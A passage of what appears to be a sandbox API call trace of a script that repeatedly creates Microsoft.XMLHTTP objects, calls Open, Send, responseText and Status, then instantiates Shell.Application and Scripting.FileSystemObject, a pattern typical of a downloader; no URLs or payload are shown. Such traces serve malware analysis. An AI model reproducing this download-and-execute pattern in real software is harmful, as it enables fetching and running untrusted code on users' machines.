	[0646.087] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0646.087] XMLHTTPRequest:IUnknown:Release (This=0x49c74b8) returned 0x0
	[0646.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0646.087] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0646.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.087] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0646.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0646.087] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0646.087] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Send", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=5) returned 0x0
	[0646.088] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0652.200] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd48 | out: ppvObject=0x28dd48*=0x0) returned 0x80004002
	[0652.200] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28de60*="responseText", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc9c | out: rgDispId=0x28dc9c*=10) returned 0x0
	[0652.200] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0652.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0652.201] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0652.201] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0652.201] CLSIDFromProgIDEx (in: lpszProgID="Shell.Application", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0))) returned 0x0
	[0652.201] SysStringLen (param_1=0x0) returned 0x0
	[0652.201] CoGetClassObject (in: rclsid=0x28c350*(Data1=0x13709620, Data2=0xc279, Data3=0x11ce, Data4=([0]=0xa4, [1]=0x9e, [2]=0x44, [3]=0x45, [4]=0x53, [5]=0x54, [6]=0x0, [7]=0x0)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x7fefe928d20) returned 0x0
	[0652.201] Shell:IUnknown:QueryInterface (in: This=0x7fefe928d20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0652.201] Shell:IClassFactory:CreateInstance (in: This=0x7fefe928d20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x396820) returned 0x0
	[0652.201] Shell:IUnknown:Release (This=0x7fefe928d20) returned 0x1
	[0652.201] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x396860) returned 0x0
	[0652.201] ??2@YAPEAX_K@Z () returned 0x62f350
	[0652.202] Shell:IObjectWithSite:SetSite (This=0x396860, pUnkSite=0x62f350) returned 0x0
	[0652.202] XMLHTTPRequest:IUnknown:AddRef (This=0x62f350) returned 0x2
	[0652.202] Shell:IUnknown:Release (This=0x396860) returned 0x1
	[0652.202] Shell:IUnknown:QueryInterface (in: This=0x396820, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x396820) returned 0x0
	[0652.202] Shell:IUnknown:AddRef (This=0x396820) returned 0x3
	[0652.202] CLSIDFromProgIDEx (in: lpszProgID="Scripting.FileSystemObject", lpclsid=0x28c350 | out: lpclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28))) returned 0x0
	[0652.202] SysStringLen (param_1=0x0) returned 0x0
	[0652.202] CoGetClassObject (in: rclsid=0x28c350*(Data1=0xd43fe01, Data2=0xf093, Data3=0x11cf, Data4=([0]=0x89, [1]=0x40, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0x5, [6]=0x42, [7]=0x28)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28c320 | out: ppv=0x28c320*=0x45f030) returned 0x0
	[0652.205] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f030, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28c328 | out: ppvObject=0x28c328*=0x0) returned 0x80004002
	[0652.205] FileSystemObject:IClassFactory:CreateInstance (in: This=0x45f030, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c310 | out: ppvObject=0x28c310*=0x45f000) returned 0x0
	[0652.205] FileSystemObject:IUnknown:Release (This=0x45f030) returned 0x0
	[0652.205] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28c2e8 | out: ppvObject=0x28c2e8*=0x0) returned 0x80004002
	[0652.205] FileSystemObject:IUnknown:QueryInterface (in: This=0x45f000, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28c2f8 | out: ppvObject=0x28c2f8*=0x45f000) returned 0x0
	[0652.205] FileSystemObject:IUnknown:AddRef (This=0x45f000) returned 0x3
	[0654.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d5f8 | out: ppvObject=0x28d5f8*=0x0) returned 0x80004002
	[0654.306] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28d710*="Status", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28d54c | out: rgDispId=0x28d54c*=7) returned 0x0
	[0654.306] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28d2d0 | out: ppvObject=0x28d2d0*=0x0) returned 0x80004002
	[0654.307] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.308] SysStringLen (param_1=0x0) returned 0x0
	[0654.308] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.308] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.308] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0654.308] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.308] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7c58) returned 0x0
	[0654.308] ??2@YAPEAX_K@Z () returned 0x62f310
	[0654.308] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7c58, pUnkSite=0x62f310) 
	[0654.308] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.308] XMLHTTPRequest:IUnknown:Release (This=0x49c7c58) returned 0x0
	[0654.308] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7450) returned 0x0
	[0654.308] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7450) returned 0x3
	[0654.308] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.308] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7450, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.311] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.311] SysStringLen (param_1=0x0) returned 0x0
	[0654.311] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.311] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c74b0) returned 0x0
	[0654.311] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.311] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5ba8) returned 0x0
	[0654.311] ??2@YAPEAX_K@Z () returned 0x62f330
	[0654.312] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5ba8, pUnkSite=0x62f330) 
	[0654.312] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f330, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.312] XMLHTTPRequest:IUnknown:Release (This=0x49c5ba8) returned 0x0
	[0654.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c74b0) returned 0x0
	[0654.312] XMLHTTPRequest:IUnknown:AddRef (This=0x49c74b0) returned 0x3
	[0654.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.312] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c74b0, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c74b0, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.312] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.312] SysStringLen (param_1=0x0) returned 0x0
	[0654.312] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.312] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.312] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7560) returned 0x0
	[0654.312] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c5b58) returned 0x0
	[0654.313] ??2@YAPEAX_K@Z () returned 0x62f310
	[0654.313] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c5b58, pUnkSite=0x62f310) 
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (This=0x62f310, riid=0x7fefe45d1d0*(Data1=0x1b, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28d7c8) 
	[0654.313] XMLHTTPRequest:IUnknown:Release (This=0x49c5b58) returned 0x0
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dccb0*(Data1=0x20400, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da68 | out: ppvObject=0x28da68*=0x49c7560) returned 0x0
	[0654.313] XMLHTTPRequest:IUnknown:AddRef (This=0x49c7560) returned 0x3
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28dd40 | out: ppvObject=0x28dd40*=0x0) returned 0x80004002
	[0654.313] XMLHTTPRequest:IDispatch:GetIDsOfNames (in: This=0x49c7560, riid=0x7fef87dccd0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0)), rgszNames=0x28dee0*="Open", cNames=0x1, lcid=0x7fe00000409, rgDispId=0x28dc94 | out: rgDispId=0x28dc94*=1) returned 0x0
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7560, riid=0x7fef87dd588*(Data1=0xa6ef9860, Data2=0xc720, Data3=0x11d0, Data4=([0]=0x93, [1]=0x37, [2]=0x0, [3]=0xa0, [4]=0xc9, [5]=0xd, [6]=0xca, [7]=0xa9)), ppvObject=0x28da20 | out: ppvObject=0x28da20*=0x0) returned 0x80004002
	[0654.313] CLSIDFromProgIDEx (in: lpszProgID="Microsoft.XMLHTTP", lpclsid=0x28dac0 | out: lpclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8))) returned 0x0
	[0654.313] SysStringLen (param_1=0x0) returned 0x0
	[0654.313] CoGetClassObject (in: rclsid=0x28dac0*(Data1=0xed8c108e, Data2=0x4349, Data3=0x11d2, Data4=([0]=0x91, [1]=0xa4, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x79, [6]=0x69, [7]=0xe8)), dwClsContext=0x15, pvReserved=0x0, riid=0x7fef87de1e8*(Data1=0x1, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x28da90 | out: ppv=0x28da90*=0x7fef289ac20) returned 0x0
	[0654.313] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x7fef289ac20, riid=0x7fef87e6380*(Data1=0x342d1ea0, Data2=0xae25, Data3=0x11d1, Data4=([0]=0x89, [1]=0xc5, [2]=0x0, [3]=0x60, [4]=0x8, [5]=0xc3, [6]=0xfb, [7]=0xfc)), ppvObject=0x28da98 | out: ppvObject=0x28da98*=0x0) returned 0x80004002
	[0654.314] XMLHTTPRequest:IClassFactory:CreateInstance (in: This=0x7fef289ac20, pUnkOuter=0x0, riid=0x7fef87dccc0*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x28da80 | out: ppvObject=0x28da80*=0x49c7450) returned 0x0
	[0654.314] XMLHTTPRequest:IUnknown:AddRef (This=0x7fef289ac20) returned 0x1
	[0654.314] XMLHTTPRequest:IUnknown:QueryInterface (in: This=0x49c7450, riid=0x7fef87e63b0*(Data1=0xfc4801a3, Data2=0x2ba9, Data3=0x11cf, Data4=([0]=0xa2, [1]=0x29, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x3d, [6]=0x73, [7]=0x52)), ppvObject=0x28da58 | out: ppvObject=0x28da58*=0x49c7878) returned 0x0
	[0654.314] ??2@YAPEAX_K@Z () returned 0x62f330
	[0654.314] XMLHTTPRequest:IObjectWithSite:SetSite (This=0x49c7878, pUnkSite=0x62f330) 
